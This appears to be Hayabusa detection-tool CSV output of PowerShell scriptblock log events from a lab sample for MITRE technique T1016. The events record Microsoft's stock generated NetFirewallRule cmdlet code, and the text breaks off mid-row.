2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Show-NetFirewallRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 
16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] 
[ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,".ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 
'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 
'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml 
}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
